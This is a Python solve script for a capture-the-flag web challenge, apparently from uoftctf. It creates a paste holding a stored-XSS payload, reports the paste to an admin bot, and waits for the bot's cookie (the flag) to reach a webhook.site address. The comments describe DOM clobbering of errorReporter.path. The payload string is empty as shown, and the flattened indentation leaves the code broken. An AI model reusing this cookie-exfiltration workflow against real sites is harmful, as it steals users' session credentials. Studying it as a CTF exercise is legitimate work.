import requests
import time
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
# The flag is most likely in document.cookie when the bot visits
# Using DOM clobbering to control errorReporter.path.value
payload = f'''
'''
print("[*] Creating paste with comprehensive exfiltration payload...")
print(f"[*] Target: {BASE_URL}")
print(f"[*] Webhook: {WEBHOOK}")
print()
session = requests.Session()
resp = session.post(
f"{BASE_URL}/note/new",
data={"title": "Flag Exfil", "body": payload},
allow_redirects=False
)
if resp.status_code == 302:
location = resp.headers.get('Location')
note_url = f"{BASE_URL}{location}"
print(f"[+] Paste created: {note_url}")
print(f"[*] You can manually test it by visiting the URL above")
print()
# Report to bot
report_resp = session.post(f"{BASE_URL}/report", data={"url": location})
if report_resp.status_code == 202:
print(f"[+] Successfully reported to bot!")
print(f"[*] Bot will visit in a few seconds...")
print()
print(f"[*] Check your webhook at: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
print()
print(f"[*] What to look for:")
print(f" - GET request with 'cookies' parameter containing the flag")
print(f" - The flag format: uoftctf{{...}}")
print()
print(f"[*] Waiting 40 seconds for bot to visit...")
for i in range(40, 0, -5):
print(f" {i} seconds remaining...")
time.sleep(5)
print()
print(f"[+] Done! Check webhook now for the flag!")
print(f" https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
else:
print(f"[-] Failed to report: {report_resp.status_code}")
else:
print(f"[-] Failed to create paste: {resp.status_code}")
print(resp.text)